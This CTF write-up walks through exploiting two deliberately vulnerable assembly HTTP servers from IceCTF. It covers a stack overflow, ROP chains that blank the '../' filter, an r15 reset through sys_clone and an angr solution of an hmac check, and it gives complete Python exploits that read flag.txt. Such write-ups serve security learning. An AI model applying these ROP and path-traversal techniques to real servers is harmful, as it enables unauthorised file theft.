It’s been almost six months since the last post, so to keep a decent yearly average it’s finally time to write something here. For the last couple of months, most of my spare time went into various CTF challenges. Since I’m very new to CTFs, I usually can’t solve the top-scoring tasks, and people familiar with CTFs probably know that lower-scoring challenges are rarely interesting enough to deserve more than a few lines of writeup (and there are usually dozens of writeups already published before I even think about writing something). This time is a bit different: IceCTF was two weeks long, so I could prepare a proper writeup before the competition ended. I did two pwn tasks, which are actually very similar to each other. The first one was initially worth 300 points, but the organizers figured out that it was easier than they thought, so they lowered its score to 140 points and published an improved version of the task for 300 points. The description for both tasks was pretty straightforward (the number of solves in the picture doesn’t reflect the final results, which were 27 and 12 respectively):



Slickserver

The first challenge was called Slickserver, and it’s just an easier version of Slickerserver. The given binary is a 64-bit ELF executable called “asmttpd”, which is probably a crossover between the words “assembler” and “httpd”. Running the executable greets us with the following message:

    rw@ubuntu:~$ ./asmttpd
    asmttpd - 0.4-emory
    Usage: ./asmttpd /path/to/directory

Symbols were not stripped, so all functions have proper names in IDA. Since the application was written in assembly, finding the vulnerable place was rather easy. For further explanations I planned to use Hex-Rays-aided C pseudocode, but because the application was written in assembly, the disassembly is more readable here. The vulnerable place is located inside the worker_thread() function (the main httpd dispatcher):

    00400FDA worker_thread proc near
    00400FDA
    00400FDA overflowIndicator = qword ptr -20h
    00400FDA payloadPtr = qword ptr -10h
    00400FDA socket = qword ptr -8
    00400FDA
    00400FDA     mov rbp, rsp
    00400FDD     sub rsp, 20h
    00400FE1     mov [rbp+payloadPtr], 0
    00400FE9     mov [rbp+overflowIndicator], 0
    00400FF1     mov rdi, 3E8h
    00400FF8     sub rsp, rdi                  ; alloca(1000)
    00400FFB     mov [rbp+payloadPtr], rsp
    00400FFF
    00400FFF worker_thread_start:
    00400FFF     call sys_accept
    00401004     mov [rbp+socket], rax
    00401008     mov rdi, rax
    0040100B     call sys_cork
    00401010
    00401010 worker_thread_continue:
    00401010     mov rdi, [rbp+socket]
    00401014     mov rsi, [rbp+payloadPtr]
    00401018     mov rdx, 2000h
    0040101F     call sys_recv                 ; recv(0x2000)
    00401024     cmp rax, 0
    00401028     jle worker_thread_close
    0040102E     push rax                      ; size of the recv data pushed on the stack
    0040102F     mov r13, [rbp+overflowIndicator]
    00401033     test r13, r13
    00401036     jz short worker_thread_continue_nohook
    00401038     mov rdi, [rbp+payloadPtr]     ; a1
    0040103C     call hmac
    00401041     xor r13, rax
    00401044     jmp r13
    00401047 ; ---------------------------------------------------------------------------
    00401047
    00401047 worker_thread_continue_nohook:

So, the application allocates 1000 (0x3E8) bytes on the stack for the recv() buffer, but then allows up to 0x2000 bytes to be received, which leads to a buffer overflow that overwrites the local variables (and other data, if you want). Immediately after recv(), it checks whether “overflowIndicator” is non-zero, and if so it calls the mysterious hmac() function on the received data. The result of hmac() XORed with “overflowIndicator” is used as a jump target (jmp r13), so it looks more like an intentional backdoor than an innocent mistake. I won’t go into the details of hmac() here, because reversing it is not necessary to solve this task (it is necessary for the second one, though, so stay tuned). It’s enough to step over it in the debugger, read the value calculated for the given payload, and XOR it with the address that jmp r13 should reach. The XOR result is appended at the end of the payload. So the current payload is (in Python):

    "A"*1000 + struct.pack('<Q', ADDRESS ^ HMAC_MAGIC)

At this point it is possible to jump to any address in the process, and the task description suggests ROP. Let’s get back to the analysis of the worker_thread() function. In the normal situation (without the exploit), the pseudocode of the function looks like this (it’s not 100% accurate, just a rough translation from Hex-Rays with some details omitted):

    if (1 != string_ends_with(payload, "\r\n\r\n"))
        goto worker_thread_400_repsonse;
    pathBegin = strchr(payload, '/');
    if (0 == pathBegin)
        goto worker_thread_400_repsonse;
    pathEnd = strchr(payload, ' ');
    if (0 == pathEnd)
        goto worker_thread_400_repsonse;
    strcpy(payload + payloadLen, directory_path);
    strcat(payload + payloadLen, pathBegin);
    while (string_remove(payload + payloadLen, "../"));
    // then it opens the file, reads its content and
    // sends a 200 HTTP response with the file content
    // ...
    worker_thread_400_repsonse:
    create_httpError_response((__int64)payloadPtr, 400LL);
    sys_send();
    goto worker_thread_close;
    // ...

The most important part here is probably string_remove() called with the “../” argument; at this point one can assume that the flag file is placed one (or more) levels above the asmttpd root directory. In previous challenges the flag was usually in a “flag.txt” file, so let’s assume that it is located at “http_root/../flag.txt”. Now let’s get back to the supposed ROP exploit: ideally it should read the flag file and send it back over the already opened connection. Sounds good, but executing this scenario turned out to be more complicated than it looks. Additionally, the binary itself contains some strange unused code that is probably meant to be used in the ROP exploit. We (hi @1amtom, @krzywix) spent quite some time trying to use those functions in the ROP chain, but in the end not a single opcode from that part of the executable was used. I’ll paste those functions here, just to have it all in one place:

    00400C79 reykjavik proc near
    00400C79     pop rax
    00400C7A     mov r14, rax
    00400C7D     push rcx
    00400C7E     push rdi
    00400C7F     mov rdi, rsp
    00400C82     xor rcx, rcx
    00400C85     not rcx
    00400C88     cld
    00400C89     repne scasb
    00400C8B     not rcx
    00400C8E     dec rcx
    00400C91     test cx, 0AAAAh
    00400C96     jz short trump
    00400C98     add r14, rcx
    00400C9B     pop rdi
    00400C9C     pop rcx
    00400C9D     mov rax, r14
    00400CA0     retn
    00400CA0 reykjavik endp ; sp-analysis failed
    00400CA1
    00400CA1 duplicity proc near
    00400CA1     mov rsi, 3
    00400CA8     mov rdi, [rbp-8]
    00400CAC
    00400CAC syndisishiring:
    00400CAC     dec rsi
    00400CAF     mov rax, 21h
    00400CB6     syscall
    00400CB8     jnz short syndisishiring
    00400CBA
    00400CBA schadenfreude:
    00400CBA     mov r13, rsp
    00400CBD     xor r13, rdx
    00400CC0     ror r13, 0Ch
    00400CC4     pop r12
    00400CC6     cmp r12, r13
    00400CC9     jnz short caligula
    00400CCB     retn
    00400CCB duplicity endp ; sp-analysis failed
    00400CCC
    00400CCC trump:
    00400CCC     int 3
    00400CCD     nop
    00400CCE
    00400CCE caligula:
    00400CCE     int 3
    00400CCF     nop
    00400CD0
    00400CD0 print_rdi proc near
    00400CD0     push rdi
    00400CD1     push rsi
    00400CD2     ; too much code, it just
    00400CD2     ; prints the rdi to stdout
    00400D4F     pop rsi
    00400D50     pop rdi
    00400D51     retn
    00400D51 print_rdi endp

So, another idea was to patch the “../” filter string and return execution to the normal path. The filter string is placed in the .data section, which has RW attributes, so a ROP chain with some write primitive should be enough to proceed with this scenario. I went through the output of ROPgadget and through the binary itself in search of useful gadgets, and I found one function that suited my needs:

    00400188 string_copy proc near
    00400188     push rdi
    00400189     push rsi
    0040018A     push rdx
    0040018B     push r10
    0040018D     push r9
    0040018F     push rbx
    00400190     push rcx
    00400191     push r8
    00400193     mov rcx, rdx
    00400196     inc rcx
    00400199     cld
    0040019A     rep movsb
    0040019C     pop r8
    0040019E     pop rcx
    0040019F     pop rbx
    004001A0     pop r9
    004001A2     pop r10
    004001A4     pop rdx
    004001A5     pop rsi
    004001A6     pop rdi
    004001A7     retn
    004001A7 string_copy endp
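One detail of string_copy() matters for the write primitive: it loads rcx with rdx + 1 before rep movsb, so even rdx = 0 still moves a single byte. Below is a toy Python 3 model of that behaviour. The four-byte memory layout is made up for illustration and only mirrors a “../” string followed by its NUL terminator.

```python
def string_copy(memory: bytearray, rdi: int, rsi: int, rdx: int) -> None:
    """Model of string_copy(): rcx = rdx + 1, then rep movsb copies rcx bytes."""
    count = rdx + 1
    for i in range(count):
        # rep movsb with the direction flag cleared copies forward, byte by byte
        memory[rdi + i] = memory[rsi + i]

# Toy memory (an assumption): "../" followed by its NUL terminator.
memory = bytearray(b"../\x00")
FILTER = 0    # offset of the filter string in the toy memory
NUL_BYTE = 3  # offset of a zero byte used as the copy source

string_copy(memory, rdi=FILTER, rsi=NUL_BYTE, rdx=0)
print(memory)  # bytearray(b'\x00./\x00')
```

After the call the string starts with a NUL byte, so as a C string it is empty.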

To perform an arbitrary write, the only thing left is a gadget that sets up the rdx (length), rsi (source buffer) and rdi (destination buffer) registers, and it’s actually part of this function (and not only this one, since almost every function in this executable has a similar epilogue). So let’s start tinkering with the ROP chain. At the moment jmp r13 executes, the stack looks like this:

    rsp + 0x0000   length of received data
    rsp + 0x0008   payload (0x3E8 bytes)
    rsp + 0x03F0   overflowIndicator
    rsp + 0x03F8   payload pointer
    rsp + 0x0400   socket

So jmp r13 needs to jump to a gadget that pops the first value from the stack (the length of the received data), then pops rdx/rsi/rdi and returns into the string_copy() function. Data required for the ROP chain:

    0x0040010b  pop r10 ; pop rdx ; pop rsi ; pop rdi ; ret
    0x0060163B  filter_prev_dir db '../',0
    0x0060163E  db 0 ; this will be used to overwrite the beginning of the string
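To see how that gadget consumes the stack, here is a small Python 3 simulation. It is only a sketch: run_gadget() is a hypothetical helper, and the length value 1008 assumes a payload of 1000 buffer bytes plus one qword.

```python
def run_gadget(stack, pops):
    """Pop one qword per register name, then one more as the return address."""
    regs = {}
    for name in pops:
        regs[name] = stack.pop(0)
    return regs, stack.pop(0)

RECV_LENGTH = 1008  # assumption: value pushed by 'push rax' after recv()

# Stack as seen at 'jmp r13': the length first, then the start of the payload.
stack = [RECV_LENGTH, 0x0, 0x60163E, 0x60163B, 0x400188]

regs, return_address = run_gadget(stack, ["r10", "rdx", "rsi", "rdi"])
print({name: hex(value) for name, value in regs.items()}, hex(return_address))
```

The length ends up in r10, which is harmless, while rdx/rsi/rdi hold exactly the arguments needed to copy one zero byte over the first character of the filter string before returning into string_copy().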

Beginning of the exploit will look like this:

    def resetString(strAddr, defRet):
        ret = ''
        ret += struct.pack('<Q', 0x0)
        ret += struct.pack('<Q', 0x60163E)  # null string
        ret += struct.pack('<Q', strAddr)
        ret += struct.pack('<Q', 0x400188)  # string_copy address
        ret += struct.pack('<Q', defRet)
        return ret

    s = socket.create_connection(("slick.vuln.icec.tf", 6600))
    dummy = '/../flag.txt ' + 'SEX'*333
    payload = resetString(0x60163B, 0x40106B)
    payload += dummy[:1000 - len(payload)]
    payload += struct.pack('<Q', 0x40010b ^ HMAC_MAGIC)
    s.send(payload)
    print s.recv(1024)
    s.close()
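The last struct.pack() in the listing relies on XOR being its own inverse: the server computes overflowIndicator ^ hmac(payload) and jumps there. A minimal Python 3 sketch of that arithmetic follows. EXAMPLE_HMAC is a made-up placeholder and build_payload() is a hypothetical helper; the real value has to be read from the debugger for the exact buffer contents being sent.

```python
import struct

BUFFER_SIZE = 0x3E8  # size of the alloca() buffer in worker_thread()

def build_payload(filler: bytes, target: int, hmac_value: int) -> bytes:
    """Pad filler to the buffer size and append target ^ hmac_value."""
    if len(filler) > BUFFER_SIZE:
        raise ValueError("filler does not fit into the buffer")
    body = filler.ljust(BUFFER_SIZE, b"A")
    return body + struct.pack("<Q", target ^ hmac_value)

# Placeholder value for illustration only, not taken from the binary.
EXAMPLE_HMAC = 0x1122334455667788
payload = build_payload(b"", 0x40010B, EXAMPLE_HMAC)

# What the server would compute before 'jmp r13'.
indicator = struct.unpack("<Q", payload[BUFFER_SIZE:])[0]
print(hex(indicator ^ EXAMPLE_HMAC))  # 0x40010b
```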

HMAC_MAGIC needs to be calculated by the application and filled in later. The only thing that requires explanation is resetString(). I’ve put it into a function because I’ll need to call it a few more times to get a fully working exploit. For now it’s enough to say that the second argument is the address where execution resumes; in this case it is right after the “if (1 != string_ends_with(payload, "\r\n\r\n"))” part (look back at the pseudocode of worker_thread()). After resuming execution, worker_thread() will look for the “/” and “ ” characters to mark the beginning and the end of the file path, so it’s best not to have these characters as part of the ROP chain. With the above exploit everything starts collapsing when the application pops the length of the received data from the stack (0x004010C1 pop r11). Instead of popping the length, it pops the beginning of the “/../flag.txt ” string and uses it to adjust the address of the payload, which will most likely result in an access violation. To cope with it I’ve added another value to the ROP chain, which serves as a dummy length:

    dummy = '/../flag.txt ' + 'SEX'*333
    payload = resetString(0x60163B, 0x40106B)
    payload += struct.pack('<Q', 0x160)  # dummy length
    payload += dummy[:1000 - len(payload)]
    payload += struct.pack('<Q', 0x40010b ^ HMAC_MAGIC)

This dummy length is used to calculate the offset at which worker_thread() concatenates http_root_directory and the requested file path; it can be any value between size_of_ROP_chain + path_length and 1000 - length_of_concatenated_path. With this adjustment worker_thread() successfully proceeds with the next steps: removing “../” substrings (already defeated), opening the file and building the HTTP 200 reply. It won’t reach sys_send() and sys_sendfile(), because it crashes inside create_http200_response(). This function is responsible for building the full HTTP reply inside the payload buffer. Unfortunately, part of this buffer was already used for the ROP chain, so the current rsp is somewhere inside the payload buffer. As a result, the HTTP reply overwrites the local variables and the return address of create_http200_response(). The body of create_http200_response() looks like this:

    int create_http200_response(void *a1, __int64 a2, __int64 a3)
    {
        string_copy(a1, http_200, 18LL);
        string_concat(a1, server_header);
        string_concat(a1, range_header);
        string_concat(a1, content_length);
        string_concat_int(a1, a3);
        string_concat(a1, crlf);
        add_content_type_header((__int64)a1);
        string_concat(a1, crlf);
        return get_string_length(a1);
    }

To minimize the size of the HTTP reply, I decided to overwrite some of the strings used in this function, namely:

    0x0060164B  http_200 db 'HTTP/1.1 200 OK',0Dh,0Ah,0
    0x00601742  server_header db 'Server: asmttpd/0.4-emory',0Dh,0Ah,0
    0x0060175E  range_header db 'Accept-Ranges: bytes',0Dh,0Ah,0
    0x0060178B  content_length db 'Content-Length: ',0

The output is no longer a valid HTTP reply, but its size doesn’t interfere with the create_http200_response() stack anymore, and I get the flag anyway. Full exploit for this challenge:

    import struct
    import socket

    def resetString(strAddr, defRet = 0x40010d):
        ret = ''
        ret += struct.pack('<Q', 0x0)
        ret += struct.pack('<Q', 0x60163E)
        ret += struct.pack('<Q', strAddr)
        ret += struct.pack('<Q', 0x400188)
        ret += struct.pack('<Q', defRet)
        return ret

    #s = socket.create_connection(("127.0.0.1", 6600))
    s = socket.create_connection(("slick.vuln.icec.tf", 6600))
    dummy = '/../flag.txt ' + 'SEX'*333
    payload = resetString(0x60164B)
    payload += resetString(0x601742)
    payload += resetString(0x60175E)
    payload += resetString(0x60178B)
    payload += resetString(0x60163B, 0x40106B)
    payload += struct.pack('<Q', 0x160)
    payload += dummy[:1000 - len(payload)]
    payload += struct.pack('<Q', 0x40010b ^ 0xba393df38f6f8c0f)
    s.send(payload)
    print s.recv(1024)
    s.close()

And the results:

    f:\research\ice2016>asmttpd_final_easy.py
    IceCTF{r0p+z3-FTW}

Slickerserver

The second challenge was an improved version of Slickserver, so it’s good to start the analysis by comparing the interesting parts of both binaries and checking whether the old exploit is still of some use. The first change is related to the size of the alloca() buffer and the maximum recv() size:

    Slickserver:
    00400FF1     mov rdi, 3E8h
    00400FF8     sub rsp, rdi
    00400FFB     mov [rbp+payloadPtr], rsp
    00400FFF     ; part of code omitted for readability
    00401010 worker_thread_continue:
    00401010     mov rdi, [rbp+socket]
    00401014     mov rsi, [rbp+payloadPtr]
    00401018     mov rdx, 2000h
    0040101F     call sys_recv

    Slickerserver:
    00401189     mov rdi, 5E8h
    00401190     sub rsp, rdi
    00401193     mov [rbp+payloadPtr], rsp
    00401197     ; part of code omitted for readability
    004011A8 worker_thread_continue:
    004011A8     mov rdi, [rbp+var_8]
    004011AC     mov rsi, [rbp+payloadPtr]
    004011B0     mov rdx, 5F0h
    004011B7     call sys_recv
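To put the difference between the two listings in numbers, here is a small Python 3 check of how many bytes recv() can write past the alloca() buffer in each binary (overflow_room() is my own helper name, not something from the binaries):

```python
def overflow_room(buffer_size: int, recv_size: int) -> int:
    """Number of bytes recv() may write past the end of the alloca() buffer."""
    return max(0, recv_size - buffer_size)

slick = overflow_room(0x3E8, 0x2000)    # Slickserver
slicker = overflow_room(0x5E8, 0x5F0)   # Slickerserver
print(slick, slicker)  # 7192 8
```

In the second binary the overflow is limited to exactly one qword past the buffer.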

In Slickserver it was a 0x3E8 buffer versus a 0x2000 receive, and now it is 0x5E8 versus 0x5F0. This isn’t a big problem for my exploit, because I was overwriting only one qword after the alloca() buffer anyway. The second change is related to the hmac() function and the way the initial code execution is reached:

    Slickserver:
    00401038     mov rdi, [rbp+payloadPtr]
    0040103C     call hmac
    00401041     xor r13, rax
    00401044     jmp r13

    Slickerserver:
    004011D0     mov rdi, [rbp+payloadPtr]
    004011D4     call hmac
    004011D9     mov r15, 0FFFFFFFFDEADDEADh
    004011E3     jmp rax

It looks like the hmac() function now has to be properly reversed, since the jump goes directly to the value returned from this function. The rest of the worker_thread() function seems to be identical. It’s also worth noting that the r15 register is now loaded with the magic value 0xFFFFFFFFDEADDEAD, so let’s see how it’s used across the executable. A quick search in IDA reveals that it’s checked in the epilogue of almost all functions. For example:

    004001CD     pop rdi
    004001CE     cmp r15, 0FFFFFFFFDEADDEADh
    004001D5     jz popitlikeitshot
    004001DB     retn

    00400ED3 popitlikeitshot:
    00400ED3     int 3
    00400ED4     nop

So, using string_copy() as a write primitive will just crash the executable, unless we somehow reset the r15 register before executing the rest of the ROP chain (or just exploit it the way the author of the task intended). I started looking at all r15 assignments; fortunately there are only 4 such places, and only one seems straightforward to use:

    00400E39 sys_clone proc near
    00400E39     mov r14, rdi
    00400E3C     mov r15, rsi
    00400E3F     mov rdi, 4000h
    00400E46     call sys_mmap_stack
    00400E4B     mov rsi, rax
    00400E4E     mov rdi, 10F11h
    00400E55     xor r10, r10
    00400E58     xor r8, r8
    00400E5B     xor r9, r9
    00400E5E     mov rax, 38h
    00400E65     syscall
    00400E67     cmp rax, 0
    00400E6B     jnz short parent
    00400E6D     push r14
    00400E6F     mov rdi, r15
    00400E72     retn
    00400E73
    00400E73 parent:
    00400E73     retn
    00400E73 sys_clone endp

I decided to give it a try and modify the old exploit to test whether the sys_clone() r15 reset works. I wanted to be sure that it works before going on with reversing hmac(), so I just patched jmp rax to jmp 0x40011C. 0x40011C is the address of a pop rdi/ret gadget, which I need to remove the payload length from the stack (exactly the same situation as in the first challenge). The sys_clone() function requires 2 parameters, in the rsi and rdi registers; it’s called from only one place in the original executable, and I decided to use exactly the same arguments in my ROP chain. The original call:

    0040114A     mov rdi, offset worker_thread
    00401151     xor rsi, rsi
    00401154     call sys_clone

List of the new addresses used by the exploit:

    0x0040011A  pop rdx ; pop rsi ; pop rdi ; ret
    0x0040011B  pop rsi ; pop rdi ; ret
    0x004001AF  string_copy
    0x00401172  worker_thread
    0x00400E39  sys_clone
    0x00401209  address inside worker_thread where execution resumes
    0x006017C0  db 0 ; this will be used to overwrite the beginning of the string
    0x006018E2  server_header db 'Server: asmttpd/0.5-emory',0Dh,0Ah,0
    0x006018FE  range_header db 'Accept-Ranges: bytes',0Dh,0Ah,0
    0x0060192B  content_length db 'Content-Length: ',0
    0x006017EB  http_200 db 'HTTP/1.1 200 OK',0Dh,0Ah,0
    0x006017DB  filter_prev_dir db '../',0

At this point payload would look like this:

    def resetString(strAddr, defRet = 0x40011A):
        ret = ''
        ret += struct.pack('<Q', 0x0)
        ret += struct.pack('<Q', 0x6017C0)
        ret += struct.pack('<Q', strAddr)
        ret += struct.pack('<Q', 0x4001AF)
        ret += struct.pack('<Q', defRet)
        return ret

    dummy = '/../flag.txt ' + 'SEX'*666
    payload = struct.pack('<Q', 0x40011B)
    payload += struct.pack('<Q', 0x0)
    payload += struct.pack('<Q', 0x401172)
    payload += struct.pack('<Q', 0x400E39)
    payload += struct.pack('<Q', 0x40011A)
    payload += resetString(0x6018E2)
    payload += resetString(0x6018FE)
    payload += resetString(0x60192B)
    payload += resetString(0x6017EB)
    payload += resetString(0x6017DB, 0x401209)
    payload += struct.pack('<Q', 0x160)
    payload += dummy[:1512 - len(payload)]
    payload += struct.pack('<Q', 0x29A)
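The first five qwords of this payload exist only to clear r15. Here is a rough Python 3 model of how they are consumed, starting from the patched jump to 0x40011C. It is a sketch under simplifying assumptions: run_chain() is a hypothetical helper, only the parent path of sys_clone() is modelled (the clone syscall itself is skipped), and the length 0x5F0 assumes a full 1520-byte payload.

```python
MAGIC = 0xFFFFFFFFDEADDEAD  # value loaded into r15 before 'jmp rax'

# Gadget addresses from the text, mapped to the registers each one pops.
GADGETS = {
    0x40011C: ["rdi"],
    0x40011B: ["rsi", "rdi"],
    0x40011A: ["rdx", "rsi", "rdi"],
}
SYS_CLONE = 0x400E39

def run_chain(stack, entry, steps):
    """Follow the chain for a fixed number of steps and return the registers."""
    regs = {"r15": MAGIC}
    pc = entry
    for _ in range(steps):
        if pc == SYS_CLONE:
            # mov r14, rdi ; mov r15, rsi (parent path, syscall not modelled)
            regs["r14"], regs["r15"] = regs["rdi"], regs["rsi"]
        else:
            for name in GADGETS[pc]:
                regs[name] = stack.pop(0)
        pc = stack.pop(0)  # ret
    return regs, pc

# Length pushed after recv() (assumed), then the first five payload qwords.
stack = [0x5F0, 0x40011B, 0x0, 0x401172, 0x400E39, 0x40011A]
regs, next_pc = run_chain(stack, entry=0x40011C, steps=3)
print(hex(regs["r15"]), hex(next_pc))  # 0x0 0x40011a
```

After sys_clone() returns, r15 no longer holds the magic value, and execution continues at the pop rdx/rsi/rdi gadget that feeds the resetString() blocks.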

The last value (0x29A) is now used only as the overflow indicator and can be anything other than 0. With jmp rax patched, the above payload successfully exploits the given binary, so it’s time to look at the hmac() internals. I’ve just used Hex-Rays to convert it to C:

    unsigned __int64 hmac(__int64 *a1)
    {
        __int64 i = 0LL;
        __int64 checksum = 0LL;
        do
        {
            checksum ^= a1[i];
            ++i;
        }
        while (i != 189);
        __int64 v5[3];
        v5[0] = checksum ^ 0x5C5C5C5C5C5C5C5CLL;
        v5[1] = a1[187];
        v5[2] = a1[188];
        v5[1] = murmur1(0xDEFACEDBAADF00DLL, v5, 24LL);
        v5[0] = checksum ^ 0x3636363636363636LL;
        return murmur1(0xFACEB00CCAFEBABELL, v5, 16LL);
    }

a1 is the payload, interpreted as an array of qwords; a quick check, 189 * sizeof(__int64) = 1512 (0x5E8), gives the exact size of the alloca() buffer. So, the hmac() function first XORs all 189 qwords of the payload, then it uses the calculated value and the two last qwords (187, 188) to calculate the final result with a murmur1() function:

    unsigned __int64 murmur1(__int64 a1, __int64 *a2, signed __int64 a3)
    {
        unsigned __int64 v4 = a1 ^ 0xA165C8277LL * a3;
        if (a3 > 7)
        {
            __int64* v5 = &a2[((unsigned __int64)(a3 - 8) >> 3) + 1];
            do
            {
                __int64 v6 = *a2 + v4;
                ++a2;
                v4 = 0xA165C8277LL * v6 ^ ((unsigned __int64)(0xA165C8277LL * v6) >> 16);
            }
            while (a2 != v5);
        }
        return 0xA165C8277LL * (0xA165C8277LL * v4 ^ (0xA165C8277LL * v4 >> 10)) ^ \
            (0xA165C8277LL * (0xA165C8277LL * v4 ^ (0xA165C8277LL * v4 >> 10)) >> 17);
    }
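For experimenting outside the debugger, the two decompiled functions can be ported to Python 3. This is my own transcription of the pseudocode above, not code from the challenge: 64-bit wraparound is emulated with an explicit mask, and I have not checked the port against the binary, so treat it as a sketch.

```python
MASK = 0xFFFFFFFFFFFFFFFF  # emulate unsigned 64-bit arithmetic
MULT = 0xA165C8277

def murmur1(seed, qwords, size):
    """Port of the decompiled murmur1(); size is the input length in bytes."""
    v4 = (seed ^ (MULT * size)) & MASK
    for q in qwords[: size // 8]:
        product = (MULT * ((q + v4) & MASK)) & MASK
        v4 = product ^ (product >> 16)
    t = (MULT * v4) & MASK
    t ^= t >> 10
    r = (MULT * t) & MASK
    return r ^ (r >> 17)

def hmac(payload_qwords):
    """Port of the decompiled hmac() over a list of 189 unsigned qwords."""
    checksum = 0
    for q in payload_qwords[:189]:
        checksum ^= q
    v5 = [checksum ^ 0x5C5C5C5C5C5C5C5C, payload_qwords[187], payload_qwords[188]]
    v5[1] = murmur1(0xDEFACEDBAADF00D, v5, 24)
    v5[0] = checksum ^ 0x3636363636363636
    return murmur1(0xFACEB00CCAFEBABE, v5, 16)

# Example input (arbitrary): qwords 1..189.
example = list(range(1, 190))
print(hex(hmac(example)))
```

Because the first 187 qwords enter the result only through the XOR checksum, reordering them does not change the output, which is what makes the "adjustment" qword trick possible.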

Looking back at the hmac() function (especially the XOR loop), it’s quite clear that the whole payload can consist of any values, except for the last 3 qwords. The last 2 are fed directly to murmur1(), and the third from the end serves as an adjustment. A few years ago I would probably have sat down and tried to reverse this function manually, but we now live in the times of SMT solvers and various frameworks that utilize them, so I decided to go with angr. I created a simple executable that just tries to execute the second murmur1() call:

    __int64 t2[2] = { 0 };

    int main()
    {
        if (0x40011C == murmur1(0xFACEB00CCAFEBABELL, t2, 16))
            printf("yuppie XXX!\n");
        return 0;
    }

t2 has only 2 qwords, because the third argument is the size of t2 in bytes. Then I ran this executable through an angr script:

    import binascii
    import angr
    import simuvex

    ADDR_OF_MAIN = # address of main() function
    ADDR_OF_INPUT_ARR = # address of t2[] global array
    SIZE_OF_INPUT = # size in bytes of t2[]
    ADDR_OF_PRINTF = # address of call printf

    p = angr.Project("murmur.exe", use_sim_procedures = True)
    initial_state = p.factory.blank_state(addr = ADDR_OF_MAIN)
    str_ptr = ADDR_OF_INPUT_ARR
    flag = initial_state.se.BVS('flag', SIZE_OF_INPUT * 8)
    initial_state.memory.store(str_ptr, flag)
    initial_path = p.factory.path(state=initial_state)
    ex = angr.surveyors.Explorer(p, start=initial_path, find = (ADDR_OF_PRINTF, ))
    r = ex.run()
    print binascii.hexlify(r.found[0].state.se.any_str(r.found[0].state.memory.load(str_ptr, SIZE_OF_INPUT)))

After 3 minutes I got the answer:

18a37f025de730e2dd77b5a0c84990e6

So, according to the hmac():

v5[1] = murmur1(0xDEFACEDBAADF00DLL, v5, 24LL);
v5[0] = checksum ^ 0x3636363636363636LL;
return murmur1(0xFACEB00CCAFEBABELL, v5, 16LL);

v5[0] = 0xe230e75d027fa318;
v5[1] = 0xe69049c8a0b577dd;
checksum = v5[0] ^ 0x3636363636363636;
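The two qwords above are simply the 16 bytes printed by the script, read as little-endian 64-bit values. A minimal Python 3 sketch of that conversion follows; the variable names and the PAD_36/PAD_5C constants are illustrative labels of mine, only the hex string and the mask values come from the listings in this post:

```python
import struct

# 16 bytes found by the solver for t2[], exactly as printed by the script
solver_output = bytes.fromhex("18a37f025de730e2dd77b5a0c84990e6")

# t2[] holds two 64-bit integers stored in little-endian byte order
v5_0, v5_1 = struct.unpack("<QQ", solver_output)

# hmac() sets v5[0] = checksum ^ 0x3636..., so XORing again recovers checksum
PAD_36 = 0x3636363636363636
checksum = v5_0 ^ PAD_36

# The follow-up C program uses this checksum XORed with 0x5C5C... as t2[0]
PAD_5C = 0x5C5C5C5C5C5C5C5C
t2_0 = checksum ^ PAD_5C

print(hex(v5_0), hex(v5_1), hex(checksum), hex(t2_0))
```

Since XOR is its own inverse, applying the same mask twice cancels out, which is why no real "reversing" is needed for this step.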

Using this data I’ve compiled another small C program:

__int64 t2[3] = { 0xe230e75d027fa318LL ^ 0x3636363636363636LL ^ 0x5C5C5C5C5C5C5C5CLL, 0, 0 };

int main()
{
    if (0xe69049c8a0b577ddLL == murmur1(0xDEFACEDBAADF00DLL, t2, 24))
        printf("yuppie XXX!\n");
}

I’ve used exactly the same ANGR script to get the final results, just with fixed addresses (and with the address of t2[1] as the input, since t2[0] is given). Result:

payload[187] = 0x5ae6e739c60d452c;
payload[188] = 0x4cf9f1385a12acf8;

And the final exploit:

import struct
import socket

def resetString(strAddr, defRet = 0x40011A):
    ret = ''
    ret += struct.pack('<Q', 0x0)
    ret += struct.pack('<Q', 0x6017C0)
    ret += struct.pack('<Q', strAddr)
    ret += struct.pack('<Q', 0x4001AF)
    ret += struct.pack('<Q', defRet)
    return ret

#s = socket.create_connection(("127.0.0.1", 6601))
s = socket.create_connection(("slick.vuln.icec.tf", 6601))

dummy = '/../flag.txt ' + 'SEX'*666

payload = struct.pack('<Q', 0x40011B)
payload += struct.pack('<Q', 0x0)
payload += struct.pack('<Q', 0x401172)
payload += struct.pack('<Q', 0x400E39)
payload += struct.pack('<Q', 0x40011A)
payload += resetString(0x6018E2)
payload += resetString(0x6018FE)
payload += resetString(0x60192B)
payload += resetString(0x6017EB)
payload += resetString(0x6017DB, 0x401209)
payload += struct.pack('<Q', 0x160)
payload += dummy[:1512 - len(payload) - 3*8]

adjustment = 0
for i in xrange( 0, len(payload), 8 ):
    adjustment ^= struct.unpack('<Q', payload[i:i+8])[0]

payload += struct.pack('<Q', adjustment ^ 0x5ae6e739c60d452c ^ 0x4cf9f1385a12acf8 ^ 0xe230e75d027fa318 ^ 0x3636363636363636)
payload += struct.pack('<Q', 0x5ae6e739c60d452c)
payload += struct.pack('<Q', 0x4cf9f1385a12acf8)
payload += struct.pack('<Q', 0x29A)

s.send(payload)
print s.recv(1024)
s.close()
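The adjustment qword is the only non-obvious part of the exploit, so here it is isolated as a Python 3 sketch. It assumes that the checksum in hmac() is a plain XOR of all qwords in the 1512-byte buffer, which is how the exploit above treats it. The helper names xor_fold() and seal() are hypothetical, and the prefix is a stand-in for the real ROP chain and padding:

```python
import struct

def xor_fold(data):
    """XOR together all little-endian qwords of data (length must be a multiple of 8)."""
    acc = 0
    for (word,) in struct.iter_unpack("<Q", data):
        acc ^= word
    return acc

def seal(prefix, tail_words, target_checksum):
    """Append one adjustment qword plus tail_words so the buffer folds to target_checksum."""
    adjustment = xor_fold(prefix) ^ target_checksum
    for word in tail_words:
        adjustment ^= word
    tail = b"".join(struct.pack("<Q", w) for w in tail_words)
    return prefix + struct.pack("<Q", adjustment) + tail

# Values taken from the post: checksum = v5[0] ^ 0x3636..., tail = payload[187], payload[188]
target = 0xe230e75d027fa318 ^ 0x3636363636363636
tail = (0x5ae6e739c60d452c, 0x4cf9f1385a12acf8)

prefix = b"A" * (1512 - 3 * 8)  # placeholder for the ROP chain and filler
sealed = seal(prefix, tail, target)

print(len(sealed), hex(xor_fold(sealed)))
```

Because the prefix only enters the checksum through XOR, any prefix can be "repaired" with a single qword, which is why everything except the last 3 qwords is free to choose.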

And flag:

f:\research\ice2016>asmttpd_final_hard.py
k`application/oIceCTF{m4ster1ng_the_4rt_of_f1x3d_p0ints}

